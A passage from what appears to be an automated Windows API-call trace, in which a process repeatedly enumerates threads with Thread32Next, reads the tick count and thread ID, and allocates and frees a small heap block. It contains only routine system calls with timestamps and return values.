(hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.980] GetTickCount () returned 0xbb32 [0186.980] GetCurrentThreadId () returned 0x5d8 [0186.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.981] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.982] GetTickCount () returned 0xbb32 [0186.982] GetCurrentThreadId () returned 0x5d8 [0186.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.982] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.984] GetTickCount () returned 0xbb32 [0186.984] GetCurrentThreadId () returned 0x5d8 [0186.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.984] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.985] GetTickCount () returned 0xbb32 [0186.985] GetCurrentThreadId () returned 0x5d8 [0186.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.986] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.987] GetTickCount () returned 0xbb32 [0186.987] GetCurrentThreadId () returned 0x5d8 [0186.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.988] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.989] GetTickCount () returned 0xbb32 [0186.989] GetCurrentThreadId () returned 0x5d8 [0186.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.989] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.990] GetTickCount () returned 0xbb32 [0186.991] GetCurrentThreadId () returned 0x5d8 [0186.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.991] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.992] GetTickCount () returned 0xbb32 [0186.992] GetCurrentThreadId () returned 0x5d8 [0186.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.993] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.994] GetTickCount () returned 0xbb42 [0186.994] GetCurrentThreadId () returned 0x5d8 [0186.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.994] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.996] GetTickCount () returned 0xbb42 [0186.996] GetCurrentThreadId () returned 0x5d8 [0186.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.996] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.997] GetTickCount () returned 0xbb42 [0186.998] GetCurrentThreadId () returned 0x5d8 [0186.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.998] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.999] GetTickCount () returned 0xbb42 [0186.999] GetCurrentThreadId () returned 0x5d8 [0186.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.000] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.001] GetTickCount () returned 0xbb42 [0187.001] GetCurrentThreadId () returned 0x5d8 [0187.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.001] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.003] GetTickCount () returned 0xbb42 [0187.003] GetCurrentThreadId () returned 0x5d8 [0187.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.003] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.004] GetTickCount () returned 0xbb42 [0187.004] GetCurrentThreadId () returned 0x5d8 [0187.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.005] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.006] GetTickCount () returned 0xbb42 [0187.006] GetCurrentThreadId () returned 0x5d8 [0187.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.006] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.008] GetTickCount () returned 0xbb42 [0187.008] GetCurrentThreadId () returned 0x5d8 [0187.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.008] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.009] GetTickCount () returned 0xbb51 [0187.009] GetCurrentThreadId () returned 0x5d8 [0187.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.010] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.011] GetTickCount () returned 0xbb51 [0187.011] GetCurrentThreadId () returned 0x5d8 [0187.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.011] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.013] GetTickCount () returned 0xbb51 [0187.013] GetCurrentThreadId () returned 0x5d8 [0187.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.013] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.014] GetTickCount () returned 0xbb51 [0187.014] GetCurrentThreadId () returned 0x5d8 [0187.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.015] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.016] GetTickCount () returned 0xbb51 [0187.016] GetCurrentThreadId () returned 0x5d8 [0187.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.016] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.018] GetTickCount () returned 0xbb51 [0187.018] GetCurrentThreadId () returned 0x5d8 [0187.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.018] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.019] GetTickCount () returned 0xbb51 [0187.019] GetCurrentThreadId () returned 0x5d8 [0187.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.020] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.021] GetTickCount () returned 0xbb51 [0187.021] GetCurrentThreadId () returned 0x5d8 [0187.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.021] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.022] GetTickCount () returned 0xbb51 [0187.022] GetCurrentThreadId () returned 0x5d8 [0187.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.023] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.024] GetTickCount () returned 0xbb61 [0187.024] GetCurrentThreadId () returned 0x5d8 [0187.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.025] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.027] GetTickCount () returned 0xbb61 [0187.027] GetCurrentThreadId () returned 0x5d8 [0187.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.027] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.028] GetTickCount () returned 0xbb61 [0187.028] GetCurrentThreadId () returned 0x5d8 [0187.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.029] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.030] GetTickCount () returned 0xbb61 [0187.030] GetCurrentThreadId () returned 0x5d8 [0187.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.031] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.032] GetTickCount () returned 0xbb61 [0187.032] GetCurrentThreadId () returned 0x5d8 [0187.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.032] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.034] GetTickCount () returned 0xbb61 [0187.034] GetCurrentThreadId () returned 0x5d8 [0187.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.034] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.035] GetTickCount () returned 0xbb61 [0187.035] GetCurrentThreadId () returned 0x5d8 [0187.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.036] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.037] GetTickCount () returned 0xbb61 [0187.037] GetCurrentThreadId () returned 0x5d8 [0187.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.038] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.039] GetTickCount () returned 0xbb61 [0187.039] GetCurrentThreadId () returned 0x5d8 [0187.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.039] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.041] GetTickCount () returned 0xbb71 [0187.041] GetCurrentThreadId () returned 0x5d8 [0187.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.041] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.042] GetTickCount () returned 0xbb71 [0187.042] GetCurrentThreadId () returned 0x5d8 [0187.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.043] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.044] GetTickCount () returned 0xbb71 [0187.044] GetCurrentThreadId () returned 0x5d8 [0187.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.045] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.046] GetTickCount () returned 0xbb71 [0187.046] GetCurrentThreadId () returned 0x5d8 [0187.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.047] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.048] GetTickCount () returned 0xbb71 [0187.048] GetCurrentThreadId () returned 0x5d8 [0187.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.049] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.050] GetTickCount () returned 0xbb71 [0187.050] GetCurrentThreadId () returned 0x5d8 [0187.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.050] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.052] GetTickCount () returned 0xbb71 [0187.052] GetCurrentThreadId () returned 0x5d8 [0187.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.052] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.053] GetTickCount () returned 0xbb71 [0187.053] GetCurrentThreadId () returned 0x5d8 [0187.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.054] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.055] GetTickCount () returned 0xbb80 [0187.055] GetCurrentThreadId () returned 0x5d8 [0187.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.056] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.057] GetTickCount () returned 0xbb80 [0187.057] GetCurrentThreadId () returned 0x5d8 [0187.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.057] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.059] GetTickCount () returned 0xbb80 [0187.059] GetCurrentThreadId () returned 0x5d8 [0187.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.059] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.060] GetTickCount () returned 0xbb80 [0187.060] GetCurrentThreadId () returned 0x5d8 [0187.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.061] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.062] GetTickCount () returned 0xbb80 [0187.062] GetCurrentThreadId () returned 0x5d8 [0187.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.062] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.064] GetTickCount () returned 0xbb80 [0187.064] GetCurrentThreadId () returned 0x5d8 [0187.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.064] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.065] GetTickCount () returned 0xbb80 [0187.066] GetCurrentThreadId () returned 0x5d8 [0187.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.066] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.067] GetTickCount () returned 0xbb80 [0187.067] GetCurrentThreadId () returned 0x5d8 [0187.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.068] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.069] GetTickCount () returned 0xbb80 [0187.069] GetCurrentThreadId () returned 0x5d8 [0187.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.069] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.071] GetTickCount () returned 0xbb90 [0187.071] GetCurrentThreadId () returned 0x5d8 [0187.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.071] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.072] GetTickCount () returned 0xbb90 [0187.072] GetCurrentThreadId () returned 0x5d8 [0187.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.073] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.074] GetTickCount () returned 0xbb90 [0187.074] GetCurrentThreadId () returned 0x5d8 [0187.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.074] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.076] GetTickCount () returned 0xbb90 [0187.076] GetCurrentThreadId () returned 0x5d8 [0187.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.076] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.077] GetTickCount () returned 0xbb90 [0187.077] GetCurrentThreadId () returned 0x5d8 [0187.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.078] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.079] GetTickCount () returned 0xbb90 [0187.079] GetCurrentThreadId () returned 0x5d8 [0187.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.079] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.080] GetTickCount () returned 0xbb90 [0187.081] GetCurrentThreadId () returned 0x5d8 [0187.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.081] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.082] GetTickCount () returned 0xbb90 [0187.082] GetCurrentThreadId () returned 0x5d8 [0187.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.083] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.084] GetTickCount () returned 0xbb90 [0187.084] GetCurrentThreadId () returned 0x5d8 [0187.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.084] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.085] GetTickCount () returned 0xbb90 [0187.085] GetCurrentThreadId () returned 0x5d8 [0187.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.086] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.087] GetTickCount () returned 0xbb9f [0187.087] GetCurrentThreadId () returned 0x5d8 [0187.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.087] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.089] GetTickCount () returned 0xbb9f [0187.089] GetCurrentThreadId () returned 0x5d8 [0187.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.089] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.090] GetTickCount () returned 0xbb9f [0187.090] GetCurrentThreadId () returned 0x5d8 [0187.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.091] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.092] GetTickCount () returned 0xbb9f [0187.092] GetCurrentThreadId () returned 0x5d8 [0187.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.092] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.094] GetTickCount () returned 0xbb9f [0187.094] GetCurrentThreadId () returned 0x5d8 [0187.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.094] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.095] GetTickCount () returned 0xbb9f [0187.095] GetCurrentThreadId () returned 0x5d8 [0187.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.096] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.097] GetTickCount () returned 0xbb9f [0187.097] GetCurrentThreadId () returned 0x5d8 [0187.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.097] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.098] GetTickCount () returned 0xbb9f [0187.098] GetCurrentThreadId () returned 0x5d8 [0187.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.099] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.100] GetTickCount () returned 0xbb9f [0187.100] GetCurrentThreadId () returned 0x5d8 [0187.100] 